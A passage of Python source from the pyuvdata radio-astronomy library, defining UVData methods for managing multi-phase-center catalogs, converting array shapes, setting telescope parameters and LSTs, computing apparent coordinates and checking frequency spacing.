np.arange(self.Nphase + 1)[
~np.isin(np.arange(self.Nphase + 1), list(used_cat_ids.keys()))
][0]
)
elif cat_id in used_cat_ids.keys():
raise ValueError(
"Provided cat_id belongs to another source (%s)." % used_cat_ids[cat_id]
)
# If source is unique, begin creating a dictionary for it
phase_dict = {
"cat_id": cat_id,
"cat_type": cat_type,
"cat_lon": cat_lon,
"cat_lat": cat_lat,
"cat_frame": cat_frame,
"cat_epoch": cat_epoch,
"cat_times": cat_times,
"cat_pm_ra": cat_pm_ra,
"cat_pm_dec": cat_pm_dec,
"cat_vrad": cat_vrad,
"cat_dist": cat_dist,
"info_source": info_source,
}
self.phase_center_catalog[cat_name] = phase_dict
self.Nphase = len(self.phase_center_catalog.keys())
return cat_id
def _remove_phase_center(self, defunct_name):
"""
Remove an entry from the internal object/source catalog.
Removes an entry from the attribute `phase_center_catalog`. Only allowed when
the UVData object in question is a multi phase center data set (i.e.,
`multi_phase_center=True`).
Parameters
----------
defunct_name : str
Name of the source to be removed
Raises
------
ValueError
If multi_phase_center is not set to True
IndexError
If the name provided is not found as a key in `phase_center_catalog`
"""
if not self.multi_phase_center:
raise ValueError(
"Cannot remove a phase center if multi_phase_center != True."
)
if defunct_name not in self.phase_center_catalog.keys():
raise IndexError("No source by that name contained in the catalog.")
del self.phase_center_catalog[defunct_name]
self.Nphase = len(self.phase_center_catalog.keys())
def _clear_unused_phase_centers(self):
"""
Remove objects dictionaries and names that are no longer in use.
Goes through the `phase_center_catalog` attribute in of a UVData object and
clears out entries that are no longer being used, and appropriately updates
`phase_center_id_array` accordingly. This function is not typically called
by users, but instead is used by other methods.
Raises
------
ValueError
If attempting to call the method when multi_phase_center=False.
"""
if not self.multi_phase_center:
raise ValueError(
"Cannot remove a phase center if multi_phase_center != True."
)
unique_cat_ids = np.unique(self.phase_center_id_array)
defunct_list = []
Nphase = 0
for cat_name in self.phase_center_catalog.keys():
cat_id = self.phase_center_catalog[cat_name]["cat_id"]
if cat_id in unique_cat_ids:
Nphase += 1
else:
defunct_list.append(cat_name)
# Check the number of "good" sources we have -- if we haven't dropped any,
# then we are free to bail, otherwise update the Nphase attribute
if Nphase == self.Nphase:
return
# Time to kill the entries that are no longer in the source stack
for defunct_name in defunct_list:
self._remove_phase_center(defunct_name)
def _check_for_unphased(self):
"""
Check which Nblts are unphased in a multi phase center dataset.
This convenience method returns back a boolean mask to identify which data
along the Blt axis contains unphased objects (which is only applicable when
multi_phase_center=True)
Returns
-------
blt_mask : ndarray of bool
A boolean mask for identifying which elements contain unphased objects
"""
if self.multi_phase_center:
# Check and see if we have any unphased objects, in which case
# their w-values should be zeroed out.
nophase_dict = {
self.phase_center_catalog[name]["cat_id"]: self.phase_center_catalog[
name
]["cat_type"]
== "unphased"
for name in self.phase_center_catalog.keys()
}
# Use dict to construct a bool array
blt_mask = np.array(
[nophase_dict[idx] for idx in self.phase_center_id_array], dtype=bool
)
else:
# If not multi phase center, we just need to check the phase type
blt_mask = np.repeat(self.phase_type == "drift", self.Nblts)
return blt_mask
def rename_phase_center(self, old_name, new_name):
"""
Rename a phase center/catalog entry within a multi phase center data set.
Parameters
----------
old_name : str
Phase center name for the data to be renamed.
new_name : str
New name for the phase center.
Raises
------
ValueError
If attempting to run the method on a non multi phase center data set, if
`old_name` is not found as a key in `phase_center_catalog`, if `new_name`
already exists as a key in `phase_center_catalog`, or if attempting to
name a source "unphased" (which is reserved).
TypeError
If `new_name` is not actually a string.
"""
if not self.multi_phase_center:
raise ValueError(
"Cannot rename a phase center if multi_phase_center != True."
)
if old_name not in self.phase_center_catalog.keys():
raise ValueError("No entry by the name %s in the catalog." % old_name)
if not isinstance(new_name, str):
raise TypeError("Value provided to new_name must be a string.")
if new_name == old_name:
# This is basically just a no-op, so return to user
return
if new_name in self.phase_center_catalog.keys():
raise ValueError(
"Must include a unique name for new_name, %s is already present "
"in phase_center_catalog." % new_name
)
if (new_name == "unphased") and (
self.phase_center_catalog[old_name]["cat_type"] != "unphased"
):
raise ValueError(
"The name unphased is reserved. Please choose another value for "
"new_name."
)
self.phase_center_catalog[new_name] = self.phase_center_catalog[old_name]
self.Nphase = len(self.phase_center_catalog.keys())
self._remove_phase_center(old_name)
def split_phase_center(self, cat_name, new_name, select_mask, downselect=False):
"""
Rename the phase center (but preserve other properties) of a subset of data.
Allows you to rename a subset of the data phased to a particular phase center,
marked by a different name than the original. Useful when you want to phase to
one position, but want to differentiate different groups of data (e.g., marking
every other integration to make jackknifing easier).
Parameters
----------
cat_name : str
Name of the phase center to be split.
new_name : str
New name for the object.
select_mask : array_like
Selection mask for which data should be identified as belonging to the phase
center labeled by `new_name`. Any array-like able to be used as an index
is suitable -- the most typical is an array of bool with length `Nblts`,
or an array of ints within the range (-Nblts, Nblts).
downselect : bool
If selecting data that is not marked as belonging to `cat_name`,
normally an error is thrown. By setting this to True, `select_mask` will
be modified to exclude data not marked as belonging to `cat_name`.
Raises
------
ValueError
If attempting to run the method on a non multi phase center data set, if
`old_name` is not found as a key in `phase_center_catalog`, if `new_name`
already exists as a key in `phase_center_catalog`, or if attempting to
name a source "unphased" (which is reserved). Also raised if `select_mask`
contains data that doesn't belong to `cat_name`, unless setting
`downselect` to True.
IndexError
If select_mask is not a valid indexing array.
UserWarning
If all data for `cat_name` was selected (in which case `rename_phase_center`
is called instead), or if no valid data was selected.
"""
# Check to make sure that everything lines up with
if not self.multi_phase_center:
raise ValueError(
"Cannot use split_phase_center on a non-multi phase center data set."
)
if not isinstance(new_name, str):
raise TypeError("Value provided to new_name must be a string.")
if cat_name not in self.phase_center_catalog.keys():
raise ValueError("No entry by the name %s in the catalog." % cat_name)
if new_name in self.phase_center_catalog.keys():
raise ValueError(
"The name %s is already found in the catalog, choose another name "
"for new_name." % new_name
)
if (new_name == "unphased") and (
self.phase_center_catalog[cat_name]["cat_type"] != "unphased"
):
raise ValueError(
"The name unphased is reserved. Please choose another value for "
"new_name."
)
try:
inv_mask = np.ones(self.Nblts, dtype=bool)
inv_mask[select_mask] = False
except IndexError:
raise IndexError(
"select_mask must be an array-like, either of ints with shape (Nblts), "
"or of ints within the range (-Nblts, Nblts)."
)
# Now that we know nthat all the inputs are sensible, lets make sure that
# the select_mask choice is sensible
cat_id = self.phase_center_catalog[cat_name]["cat_id"]
# If we have selected any entries that don't correspond to the cat_id
# in question, either downselect or raise an error.
if np.any(cat_id != self.phase_center_id_array[select_mask]):
if downselect:
select_mask = np.logical_and(
~inv_mask, cat_id == self.phase_center_id_array
)
inv_mask = ~select_mask
else:
raise ValueError(
"Data selected with select_mask includes that which has not been "
"phased to %s. You can fix this by either revising select_mask or "
"setting downselect=True." % cat_name
)
# Now check for no(-ish) ops
if np.all(inv_mask):
# You didn't actually select anything we could change
warnings.warn(
"No relevant data selected - %s not added to the data set" % new_name
)
elif not np.any(cat_id == self.phase_center_id_array[inv_mask]):
# No matching catalog IDs found outside the range, so this is really a
# replace more than a split.
warnings.warn(
"All data for %s selected - using rename_phase_center instead of a "
"split_phase_center." % cat_name
)
self.rename_phase_center(cat_name, new_name)
else:
temp_dict = self.phase_center_catalog[cat_name]
cat_id = self._add_phase_center(
new_name,
temp_dict["cat_type"],
cat_lon=temp_dict.get("cat_lon"),
cat_lat=temp_dict.get("cat_lat"),
cat_frame=temp_dict.get("cat_frame"),
cat_epoch=temp_dict.get("cat_epoch"),
cat_times=temp_dict.get("cat_times"),
cat_pm_ra=temp_dict.get("cat_pm_ra"),
cat_pm_dec=temp_dict.get("cat_pm_dec"),
cat_dist=temp_dict.get("cat_dist"),
cat_vrad=temp_dict.get("cat_vrad"),
)
self.phase_center_id_array[select_mask] = cat_id
def merge_phase_centers(self, catname1, catname2, force_merge=False):
"""
Merge two differently named objects into one within a mutli-phase-ctr data set.
Recombines two different objects into a single catalog entry -- useful if
having previously used `split_phase_center` or when multiple objects with
different names share the same source parameters.
Parameters
----------
catname1 : str
String containing the name of the first phase center. Note that this name
will be preserved in the UVData object.
catname2 : str
String containing the name of the second phase center, which will be merged
into the first phase center. Note that once the merge is complete, all
information about this phase center is removed.
force_merge : bool
Normally, the method will throw an error if the phase center properties
differ for `catname1` and `catname2`. This can be overriden by setting this
to True. Default is False.
Raises
------
ValueError
If catname1 or catname2 are not found in the UVData object, of if their
properties differ (and `force_merge` is not set to True).
UserWarning
If forcing the merge of two objects with different properties.
"""
if not self.multi_phase_center:
raise ValueError(
"Cannot use merge_phase_centers on a non-multi phase center data set."
)
if catname1 not in self.phase_center_catalog.keys():
raise ValueError("No entry by the name %s in the catalog." % catname1)
if catname2 not in self.phase_center_catalog.keys():
raise ValueError("No entry by the name %s in the catalog." % catname2)
temp_dict = self.phase_center_catalog[catname2]
# First, let's check and see if the dict entries are identical
cat_id, cat_diffs = self._look_in_catalog(
catname1,
cat_type=temp_dict["cat_type"],
cat_lon=temp_dict.get("cat_lon"),
cat_lat=temp_dict.get("cat_lat"),
cat_frame=temp_dict.get("cat_frame"),
cat_epoch=temp_dict.get("cat_epoch"),
cat_times=None,
cat_pm_ra=None,
cat_pm_dec=None,
cat_dist=None,
cat_vrad=None,
)
if cat_diffs != 0:
if force_merge:
warnings.warn(
"Forcing %s and %s together, even though their attributes "
"differ" % (catname1, catname2)
)
else:
raise ValueError(
"Attributes of %s and %s differ in phase_center_catalog, which "
"means that they are likely not referring to the same position in "
"the sky. You can ignore this error and force merge_phase_centers "
"to complete by setting force_merge=True, but this should be done "
"with substantial caution." % (catname1, catname2)
)
old_cat_id = self.phase_center_catalog[catname2]["cat_id"]
self.phase_center_id_array[self.phase_center_id_array == old_cat_id] = cat_id
self._remove_phase_center(catname2)
def print_phase_center_info(
self, cat_name=None, hms_format=None, return_str=False, print_table=True
):
"""
Print out the details of objects in a mutli-phase-ctr data set.
Prints out an ASCII table that contains the details of the
`phase_center_catalog` attribute, which acts as the internal source catalog
for UVData objects.
Parameters
----------
cat_name : str
Optional parameter which, if provided, will cause the method to only return
information on the phase center with the matching name. Default is to print
out information on all catalog entries.
hms_format : bool
Optional parameter, which if selected, can be used to force coordinates to
be printed out in Hours-Min-Sec (if set to True) or Deg-Min-Sec (if set to
False) format. Default is to print out in HMS if all the objects have
coordinate frames of icrs, gcrs, fk5, fk4, and top; otherwise, DMS format
is used.
return_str: bool
If set to True, the method returns an ASCII string which contains all the
table infrmation. Default is False.
print_table : bool
If set to True, prints the table to the terminal window. Default is True.
Returns
-------
table_str : bool
If return_str=True, an ASCII string containing the entire table text
Raises
------
ValueError
If `cat_name` matches no keys in `phase_center_catalog`.
"""
r2d = 180.0 / np.pi
r2m = 60.0 * 180.0 / np.pi
r2s = 3600.0 * 180.0 / np.pi
ra_frames = ["icrs", "gcrs", "fk5", "fk4", "topo"]
if not self.multi_phase_center:
raise ValueError(
"Cannot use print_phase_center_info on a "
"non-multi phase center data set."
)
if cat_name is None:
name_list = list(self.phase_center_catalog.keys())
dict_list = [self.phase_center_catalog[name] for name in name_list]
elif cat_name in self.phase_center_catalog.keys():
name_list = [cat_name]
dict_list = [self.phase_center_catalog[cat_name]]
else:
raise ValueError("No entry by the name %s in the catalog." % cat_name)
# We want to check and actually see which fields we need to
# print
any_lon = any_lat = any_frame = any_epoch = any_times = False
any_pm_ra = any_pm_dec = any_dist = any_vrad = False
cat_id_list = []
for indv_dict in dict_list:
cat_id_list.append(indv_dict["cat_id"])
any_lon = any_lon or indv_dict.get("cat_lon") is not None
any_lat = any_lat or indv_dict.get("cat_lat") is not None
any_frame = any_frame or indv_dict.get("cat_frame") is not None
any_epoch = any_epoch or indv_dict.get("cat_epoch") is not None
any_times = any_times or indv_dict.get("cat_times") is not None
any_pm_ra = any_pm_ra or indv_dict.get("cat_pm_ra") is not None
any_pm_dec = any_pm_dec or indv_dict.get("cat_pm_dec") is not None
any_dist = any_dist or indv_dict.get("cat_dist") is not None
any_vrad = any_vrad or indv_dict.get("cat_vrad") is not None
if any_lon and (hms_format is None):
cat_frame = indv_dict.get("cat_frame")
cat_type = indv_dict["cat_type"]
if (cat_frame not in ra_frames) or (cat_type == "driftscan"):
hms_format = False
if hms_format is None:
hms_format = True
col_list = []
col_list.append(
{"hdr": ("ID", "#"), "fmt": "% 4i", "field": " %4s ", "name": "cat_id"}
)
col_list.append(
{
"hdr": ("Cat Entry", "Name"),
"fmt": "%12s",
"field": " %12s ",
"name": "cat_name",
}
)
col_list.append(
{"hdr": ("Type", ""), "fmt": "%9s", "field": " %9s ", "name": "cat_type"}
)
if any_lon:
col_list.append(
{
"hdr": ("Az/Lon/RA", "hours" if hms_format else "deg"),
"fmt": "% 3i:%02i:%05.2f",
"field": (" %12s " if hms_format else " %13s "),
"name": "cat_lon",
}
)
if any_lat:
col_list.append(
{
"hdr": ("El/Lat/Dec", "deg"),
"fmt": "%1s%2i:%02i:%05.2f",
"field": " %12s ",
"name": "cat_lat",
}
)
if any_frame:
col_list.append(
{
"hdr": ("Frame", ""),
"fmt": "%5s",
"field": " %5s ",
"name": "cat_frame",
}
)
if any_epoch:
col_list.append(
{
"hdr": ("Epoch", ""),
"fmt": "%7s",
"field": " %7s ",
"name": "cat_epoch",
}
)
if any_times:
col_list.append(
{
"hdr": (" Ephem Range ", "Start-MJD End-MJD"),
"fmt": " %8.2f % 8.2f",
"field": " %20s ",
"name": "cat_times",
}
)
if any_pm_ra:
col_list.append(
{
"hdr": ("PM-Ra", "mas/yr"),
"fmt": "%.4g",
"field": " %6s ",
"name": "cat_pm_ra",
}
)
if any_pm_dec:
col_list.append(
{
"hdr": ("PM-Dec", "mas/yr"),
"fmt": "%.4g",
"field": " %6s ",
"name": "cat_pm_dec",
}
)
if any_dist:
col_list.append(
{
"hdr": ("Dist", "pc"),
"fmt": "%.1e",
"field": " %7s ",
"name": "cat_dist",
}
)
if any_vrad:
col_list.append(
{
"hdr": ("V_rad", "km/s"),
"fmt": "%.4g",
"field": " %6s ",
"name": "cat_vrad",
}
)
top_str = ""
bot_str = ""
for col in col_list:
top_str += col["field"] % col["hdr"][0]
bot_str += col["field"] % col["hdr"][1]
info_str = ""
info_str += top_str + "\n"
info_str += bot_str + "\n"
info_str += ("-" * len(bot_str)) + "\n"
# We want to print in the order of cat_id
for idx in np.argsort(cat_id_list):
tbl_str = ""
for col in col_list:
# If we have a "special" field that needs extra handling,
# take care of that up front
if col["name"] == "cat_name":
temp_val = name_list[idx]
else:
temp_val = dict_list[idx][col["name"]]
if temp_val is None:
temp_str = ""
elif col["name"] == "cat_lon":
temp_val = np.median(temp_val)
temp_val /= 15.0 if hms_format else 1.0
coord_tuple = (
np.mod(temp_val * r2d, 360.0),
np.mod(temp_val * r2m, 60.0),
np.mod(temp_val * r2s, 60.0),
)
temp_str = col["fmt"] % coord_tuple
elif col["name"] == "cat_lat":
temp_val = np.median(temp_val)
coord_tuple = (
"-" if temp_val < 0.0 else "+",
np.mod(np.abs(temp_val) * r2d, 360.0),
np.mod(np.abs(temp_val) * r2m, 60.0),
np.mod(np.abs(temp_val) * r2s, 60.0),
)
temp_str = col["fmt"] % coord_tuple
elif col["name"] == "cat_epoch":
use_byrs = dict_list[idx]["cat_frame"] in ["fk4", "fk4noeterms"]
temp_val = ("B%6.1f" if use_byrs else "J%6.1f") % temp_val
temp_str = col["fmt"] % temp_val
elif col["name"] == "cat_times":
time_tuple = (
np.min(temp_val) - 2400000.5,
np.max(temp_val) - 2400000.5,
)
temp_str = col["fmt"] % time_tuple
elif (col["name"] == "cat_dist") or (col["name"] == "cat_vrad"):
temp_val = np.median(temp_val)
temp_str = col["fmt"] % temp_val
else:
temp_str = col["fmt"] % temp_val
tbl_str += col["field"] % temp_str
info_str += tbl_str + "\n"
if print_table:
# We need this extra bit of code to handle trailing whitespace, since
# otherwise some checks (e.g., doc check on tutorials) will balk
print(
"\n".join([line.rstrip() for line in info_str.split("\n")]), end=""
) # pragma: nocover
if return_str:
return info_str
def _update_phase_center_id(self, cat_name, new_cat_id=None, reserved_ids=None):
"""
Update a phase center with a new catalog ID number.
Parameters
----------
cat_name : str
Name of the phase center, which corresponds to a key in the attribute
`phase_center_catalog`.
new_cat_id : int
Optional argument. If supplied, then the method will attempt to use the
provided value as the new catalog ID, provided that an existing catalog
entry is not already using the same value. If not supplied, then the
method will automatically assign a value.
reserved_ids : array-like in int
Optional argument. An array-like of ints that denotes which ID numbers
are already reserved. Useful for when combining two separate catalogs.
Raises
------
ValueError
If not using the method on a multi-phase-ctr data set, if there's no entry
that matches `cat_name`, or of the value `new_cat_id` is already taken.
"""
if not self.multi_phase_center:
raise ValueError(
"Cannot use _update_phase_center_id on a "
"non-multi phase center data set."
)
if cat_name not in self.phase_center_catalog.keys():
raise ValueError(
"Cannot run _update_phase_center_id: no entry with name %s." % cat_name
)
old_cat_id = self.phase_center_catalog[cat_name]["cat_id"]
used_cat_ids = [] if (reserved_ids is None) else reserved_ids.copy()
for name in self.phase_center_catalog.keys():
if name != cat_name:
used_cat_ids.append(self.phase_center_catalog[name]["cat_id"])
if new_cat_id is None:
# If the old ID is in the reserved list, then we'll need to update it
if old_cat_id not in used_cat_ids:
# Don't need to actually update anything
return
else:
new_cat_id = np.arange(len(used_cat_ids) + 1)[
~np.isin(np.arange(len(used_cat_ids) + 1), used_cat_ids)
][0]
else:
if new_cat_id in used_cat_ids:
raise ValueError("Catalog ID supplied already taken by another source.")
self.phase_center_id_array[
self.phase_center_id_array == old_cat_id
] = new_cat_id
self.phase_center_catalog[cat_name]["cat_id"] = new_cat_id
def _set_multi_phase_center(self, preserve_phase_center_info=False):
"""
Set multi_phase_center to True, and adjust required paramteres.
This method is typically not be called directly by users; instead it is called
by the file-reading methods to indicate that an object has multiple phase
centers with in the same data set.
Parameters
----------
preserve_phase_center_info : bool
Preserve the source information located in `object_name`, and for phased
data sets, also `phase_center_ra`, `phase_center_dec`, `phase_center_epoch`
and `phase_center_frame`. Default is False. Note that setting this to
False will mean that some required attributes will NOT be correctly set,
e.g., `phase_center_id_array` -- these will need to be set after calling
`preserve_phase_center_info` in order for the UVData object to be viable.
Raises
------
ValueError
if the telescope_name is not in known telescopes
"""
# If you have already set this, don't do anything
if self.multi_phase_center:
return
# All multi phase center objects have phase_type="phased", even if they are
# unphased.
if self.phase_type == "phased":
cat_type = "sidereal"
else:
self._set_phased()
cat_type = "unphased"
self.multi_phase_center = True
# Mark once-option arrays as now required
self._phase_center_id_array.required = True
self._Nphase.required = True
self._phase_center_catalog.required = True
# This should technically be required for any phased data set, but for now,
# we are only gonna make it mandatory for mutli-phase-ctr data sets.
self._phase_center_app_ra.required = True
self._phase_center_app_dec.required = True
self._phase_center_frame_pa.required = True
self.Nphase = 0
self.phase_center_catalog = {}
cat_name = self.object_name
self.object_name = "multi"
if preserve_phase_center_info:
cat_id = self._add_phase_center(
cat_name,
cat_type=cat_type,
cat_lon=self.phase_center_ra,
cat_lat=self.phase_center_dec,
cat_frame=self.phase_center_frame,
cat_epoch=self.phase_center_epoch,
)
self.phase_center_id_array = np.zeros(self.Nblts, dtype=int) + cat_id
self.phase_center_ra = 0.0
self.phase_center_dec = 0.0
if self.phase_center_frame is None:
self.phase_center_frame = "icrs"
if self.phase_center_epoch is None:
self.phase_center_epoch = 2000.0
if (cat_type == "unphased") and preserve_phase_center_info:
# If moving from unphased, then we'll fill in app_ra and app_dec in
# the way that we normally would if this were an "unphased" object.
self._set_app_coords_helper()
def _set_drift(self):
"""
Set phase_type to 'drift' and adjust required parameters.
This method should not be called directly by users; instead it is called
by phasing methods and file-reading methods to indicate the object has a
`phase_type` of "drift" and define which metadata are required.
"""
self.phase_type = "drift"
self._phase_center_frame.required = False
self._phase_center_ra.required = False
self._phase_center_dec.required = False
self._phase_center_app_ra.required = False
self._phase_center_app_dec.required = False
self._phase_center_frame_pa.required = False
def _set_phased(self):
"""
Set phase_type to 'phased' and adjust required parameters.
This method should not be called directly by users; instead it is called
by phasing methods and file-reading methods to indicate the object has a
`phase_type` of "phased" and define which metadata are required.
"""
self.phase_type = "phased"
self._phase_center_frame.required = True
self._phase_center_ra.required = True
self._phase_center_dec.required = True
self._phase_center_app_ra.required = True
self._phase_center_app_dec.required = True
self._phase_center_frame_pa.required = True
@property
def _data_params(self):
"""List of strings giving the data-like parameters."""
return ["data_array", "nsample_array", "flag_array"]
@property
def data_like_parameters(self):
"""Iterate defined parameters which are data-like (not metadata-like)."""
for key in self._data_params:
if hasattr(self, key):
yield getattr(self, key)
@property
def metadata_only(self):
"""
Property that determines whether this is a metadata only object.
An object is metadata only if data_array, nsample_array and flag_array
are all None.
"""
metadata_only = all(d is None for d in self.data_like_parameters)
for param_name in self._data_params:
getattr(self, "_" + param_name).required = not metadata_only
return metadata_only
def _set_future_array_shapes(self):
"""
Set future_array_shapes to True and adjust required parameters.
This method should not be called directly by users; instead it is called
by file-reading methods and `use_future_array_shapes` to indicate the
`future_array_shapes` is True and define expected parameter shapes.
"""
self.future_array_shapes = True
self._freq_array.form = ("Nfreqs",)
self._channel_width.form = ("Nfreqs",)
for param_name in self._data_params:
getattr(self, "_" + param_name).form = ("Nblts", "Nfreqs", "Npols")
def use_future_array_shapes(self):
"""
Change the array shapes of this object to match the planned future shapes.
This method sets allows users to convert to the planned array shapes changes
before the changes go into effect. This method sets the `future_array_shapes`
parameter on this object to True.
"""
self._set_future_array_shapes()
if not self.metadata_only:
# remove the length-1 spw axis for all data-like parameters
for param_name in self._data_params:
setattr(self, param_name, (getattr(self, param_name))[:, 0, :, :])
# remove the length-1 spw axis for the freq_array
self.freq_array = self.freq_array[0, :]
if not self.flex_spw:
# make channel_width be an array of length Nfreqs rather than a single value
# (not needed with flexible spws because this is already done in that case)
self.channel_width = (
np.zeros(self.Nfreqs, dtype=np.float64) + self.channel_width
)
def use_current_array_shapes(self):
"""
Change the array shapes of this object to match the current future shapes.
This method sets allows users to convert back to the current array shapes.
This method sets the `future_array_shapes` parameter on this object to False.
"""
if not self.flex_spw:
unique_channel_widths = np.unique(self.channel_width)
if unique_channel_widths.size > 1:
raise ValueError(
"channel_width parameter contains multiple unique values, but "
"only one spectral window is present. Cannot collapse "
"channel_width to a single value."
)
self._channel_width.form = ()
self.channel_width = unique_channel_widths[0]
self.future_array_shapes = False
for param_name in self._data_params:
getattr(self, "_" + param_name).form = ("Nblts", 1, "Nfreqs", "Npols")
if not self.metadata_only:
for param_name in self._data_params:
setattr(
self, param_name, (getattr(self, param_name))[:, np.newaxis, :, :]
)
self._freq_array.form = (
1,
"Nfreqs",
)
self.freq_array = self.freq_array[np.newaxis, :]
def known_telescopes(self):
"""
Get a list of telescopes known to pyuvdata.
This is just a shortcut to uvdata.telescopes.known_telescopes()
Returns
-------
list of str
List of names of known telescopes
"""
return uvtel.known_telescopes()
def set_telescope_params(self, overwrite=False):
"""
Set telescope related parameters.
If the telescope_name is in the known_telescopes, set any missing
telescope-associated parameters (e.g. telescope location) to the value
for the known telescope.
Parameters
----------
overwrite : bool
Option to overwrite existing telescope-associated parameters with
the values from the known telescope.
Raises
------
ValueError
if the telescope_name is not in known telescopes
"""
telescope_obj = uvtel.get_telescope(self.telescope_name)
if telescope_obj is not False:
params_set = []
for p in telescope_obj:
telescope_param = getattr(telescope_obj, p)
self_param = getattr(self, p)
if telescope_param.value is not None and (
overwrite is True or self_param.value is None
):
telescope_shape = telescope_param.expected_shape(telescope_obj)
self_shape = self_param.expected_shape(self)
if telescope_shape == self_shape:
params_set.append(self_param.name)
prop_name = self_param.name
setattr(self, prop_name, getattr(telescope_obj, prop_name))
else:
# expected shapes aren't equal. This can happen
# e.g. with diameters,
# which is a single value on the telescope object but is
# an array of length Nants_telescope on the UVData object
# use an assert here because we want an error if this condition
# isn't true, but it's really an internal consistency check.
# This will error if there are changes to the Telescope
# object definition, but nothing that a normal user
# does will cause an error
assert telescope_shape == () and self_shape != "str"
# this parameter is as of this comment most likely a float
# since only diameters and antenna positions will probably
# trigger this else statement
# assign float64 as the type of the array
array_val = (
np.zeros(self_shape, dtype=np.float64,)
+ telescope_param.value
)
params_set.append(self_param.name)
prop_name = self_param.name
setattr(self, prop_name, array_val)
if len(params_set) > 0:
params_set_str = ", ".join(params_set)
warnings.warn(
"{params} is not set. Using known values "
"for {telescope_name}.".format(
params=params_set_str,
telescope_name=telescope_obj.telescope_name,
)
)
else:
raise ValueError(
f"Telescope {self.telescope_name} is not in known_telescopes."
)
def _calc_single_integration_time(self):
"""
Calculate a single integration time in seconds when not otherwise specified.
This function computes the shortest time difference present in the
time_array, and returns it to be used as the integration time for all
samples.
Returns
-------
int_time : int
integration time in seconds to be assigned to all samples in the data.
"""
# The time_array is in units of days, and integration_time has units of
# seconds, so we need to convert.
return np.diff(np.sort(list(set(self.time_array))))[0] * 86400
def _set_lsts_helper(self):
latitude, longitude, altitude = self.telescope_location_lat_lon_alt_degrees
unique_times, inverse_inds = np.unique(self.time_array, return_inverse=True)
unique_lst_array = uvutils.get_lst_for_time(
unique_times, latitude, longitude, altitude,
)
self.lst_array = unique_lst_array[inverse_inds]
return
def _set_app_coords_helper(self, pa_only=False):
"""
Set values for the apparent coordinate arrays.
This is an internal helper function, which is not designed to be called by
users, but rather individual read/write functions for the UVData object.
Users should use the phase() method for updating/adjusting coordinate values.
Parameters
----------
pa_only : bool, False
Skip the calculation of the apparent RA/Dec, and only calculate the
position angle between `phase_center_frame` and the apparent coordinate
system. Useful for reading in data formats that do not calculate a PA.
"""
if self.phase_type != "phased":
# Uhhh... what do you want me to do? If the dataset isn't phased, there
# isn't an apparent position to calculate. Time to bail, I guess...
return
if pa_only:
app_ra = self.phase_center_app_ra
app_dec = self.phase_center_app_dec
elif self.multi_phase_center:
app_ra = np.zeros(self.Nblts, dtype=float)
app_dec = np.zeros(self.Nblts, dtype=float)
for name in self.phase_center_catalog.keys():
temp_dict = self.phase_center_catalog[name]
select_mask = self.phase_center_id_array == temp_dict["cat_id"]
cat_type = temp_dict["cat_type"]
lon_val = temp_dict.get("cat_lon")
lat_val = temp_dict.get("cat_lat")
epoch = temp_dict.get("cat_epoch")
frame = temp_dict.get("cat_frame")
pm_ra = temp_dict.get("cat_pm_ra")
pm_dec = temp_dict.get("cat_pm_dec")
vrad = temp_dict.get("vrad")
dist = temp_dict.get("cat_dist")
app_ra[select_mask], app_dec[select_mask] = uvutils.calc_app_coords(
lon_val,
lat_val,
frame,
coord_epoch=epoch,
pm_ra=pm_ra,
pm_dec=pm_dec,
vrad=vrad,
dist=dist,
time_array=self.time_array[select_mask],
lst_array=self.lst_array[select_mask],
telescope_loc=self.telescope_location_lat_lon_alt,
coord_type=cat_type,
)
else:
# So this is actually the easier of the two cases -- just use the object
# properties to fill in the relevant data
app_ra, app_dec = uvutils.calc_app_coords(
self.phase_center_ra,
self.phase_center_dec,
self.phase_center_frame,
coord_epoch=self.phase_center_epoch,
time_array=self.time_array,
lst_array=self.lst_array,
telescope_loc=self.telescope_location_lat_lon_alt,
coord_type="sidereal",
)
# Now that we have the apparent coordinates sorted out, we can figure out what
# it is we want to do with the position angle
frame_pa = uvutils.calc_frame_pos_angle(
self.time_array,
app_ra,
app_dec,
self.telescope_location_lat_lon_alt,
self.phase_center_frame,
ref_epoch=self.phase_center_epoch,
)
self.phase_center_app_ra = app_ra
self.phase_center_app_dec = app_dec
self.phase_center_frame_pa = frame_pa
def set_lsts_from_time_array(self, background=False):
"""Set the lst_array based from the time_array.
Parameters
----------
background : bool, False
When set to True, start the calculation on a threading.Thread in the
background and return the thread to the user.
Returns
-------
proc : None or threading.Thread instance
When background is set to True, a thread is returned which must be
joined before the lst_array exists on the UVData object.
"""
if not background:
self._set_lsts_helper()
return
else:
proc = threading.Thread(target=self._set_lsts_helper)
proc.start()
return proc
def _check_flex_spw_contiguous(self):
"""
Check if the spectral windows are contiguous for flex_spw datasets.
This checks the flex_spw_id_array to make sure that all channels for each
spectral window are together in one block, versus being interspersed (e.g.,
channel #1 and #3 is in spw #1, channels #2 and #4 are in spw #2). In theory,
UVH5 and UVData objects can handle this, but MIRIAD, MIR, UVFITS, and MS file
formats cannot, so we just consider it forbidden.
"""
if self.flex_spw:
exp_spw_ids = np.unique(self.spw_array)
# This is an internal consistency check to make sure that the indexes match
# up as expected -- this shouldn't error unless someone is mucking with
# settings they shouldn't be.
assert np.all(np.unique(self.flex_spw_id_array) == exp_spw_ids)
n_breaks = np.sum(self.flex_spw_id_array[1:] != self.flex_spw_id_array[:-1])
if (n_breaks + 1) != self.Nspws:
raise ValueError(
"Channels from different spectral windows are interspersed with "
"one another, rather than being grouped together along the "
"frequency axis. Most file formats do not support such "
"non-grouping of data."
)
else:
# If this isn't a flex_spw data set, then there is only 1 spectral window,
# which means that the check always passes
pass
return True
def _check_freq_spacing(self, raise_errors=True):
"""
Check if frequencies are evenly spaced and separated by their channel width.
This is a requirement for writing uvfits & miriad files.
Parameters
----------
raise_errors : bool
Option to raise errors if the various checks do not pass.
Returns
-------
spacing_error : bool
Flag that channel spacings or channel widths are not equal.
chanwidth_error : bool
Flag that channel spacing does not match channel width.
"""
spacing_error = False
chanwidth_error = False
if self.future_array_shapes:
freq_spacing = np.diff(self.freq_array)
freq_array_use = self.freq_array
else:
freq_spacing = np.diff(self.freq_array[0])
freq_array_use = self.freq_array[0]
if self.Nfreqs == 1:
# Skip all of this if there is only 1 channel
pass
elif self.flex_spw:
# Check to make sure that the flexible spectral window has indicies set up
# correctly (grouped together) for this check
self._check_flex_spw_contiguous()
diff_chanwidth = np.diff(self.channel_width)
freq_dir = []
# We want to grab unique spw IDs, in the order that they appear in the data
select_mask = np.append((np.diff(self.flex_spw_id_array) != 0), True)
for idx in self.flex_spw_id_array[select_mask]:
chan_mask = self.flex_spw_id_array == idx
freq_dir += [
np.sign(np.mean(np.diff(freq_array_use[chan_mask])))
